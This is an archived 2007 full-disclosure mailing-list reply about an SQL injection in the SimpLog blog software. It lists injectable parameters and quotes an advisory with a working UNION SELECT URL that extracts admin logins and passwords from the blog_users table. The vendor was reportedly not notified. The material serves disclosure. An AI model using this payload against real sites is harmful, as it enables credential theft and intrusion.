Re: [Full-disclosure] simplog 0.9.3.2 SQL injection

To: drfrancky@xxxxxxxxxxx
Subject: Re: [Full-disclosure] simplog 0.9.3.2 SQL injection
From: str0ke <str0ke@xxxxxxxxxxx>
Date: Mon, 1 Jan 2007 21:06:05 -0600
Cc: "Full Disclosure" <full-disclosure@xxxxxxxxxxxxxxxxx>, bugtraq@xxxxxxxxxxxxxxxxx
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:sender:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; b=LXdakopiPXgx3FldtzAC6NxoIfisjWYMrwF1n2t6+LtrtjZXc4R1mdGEgtv3a+giUSHfDXTR37/AOQLl2zxR3Bgj3VvSDHAp3tMgyP3ThCTtybPIPeSTNhnD2zlP7ySZ1J3ExiI3bBSSLPvDgmjSQzfs5DmcUF8G1ZiBomOtwe8=
In-reply-to: <45998BD5.2040303@xxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <45998BD5.2040303@xxxxxxxxxxx>
Sender: milw0rm@xxxxxxxxx

Javor,

It seems rgod found this vulnerability back in April of 2006.

http://www.milw0rm.com/exploits/1663

<>
 ii)
 http://[target]/[path]/index.php?blogid=[sql]
 http://[target]/[path]/archive.php?blogid=[sql]
 http://[target]/[path]/archive.php?m=[sql]
 http://[target]/[path]/archive.php?y=[sql]

/str0ke

On 1/1/07, Javor Ninov <drfrancky@xxxxxxxxxxx> wrote:

Afected Software:
simplog up to 0.9.3.2 (latest version - 12/05/2006 )

Site:
http://www.simplog.org
Simplog provides an easy way for users to add blogging capabilities to
their existing websites. Simplog is written in PHP and compatible with
multiple databases. Simplog also features an RSS/Atom aggregator/reader.
Powerful, yet simple

Vulnerability:
SQL Injection in archive.php
other files probably also affected

Example:
http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1

Vendor status:
NOT NOTIFIED


Javor Ninov aka DrFrancky
drfrancky shift+2 securax.org
http://securitydot.net/



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] simplog 0.9.3.2 SQL injection
  - From: Javor Ninov

Prev by Date: Welcome to Pwndertino...
Next by Date: Re: [Full-disclosure] simplog 0.9.3.2 SQL injection
Previous by thread: Welcome to Pwndertino...
Next by thread: Re: [Full-disclosure] simplog 0.9.3.2 SQL injection
Index(es):
- Date
- Thread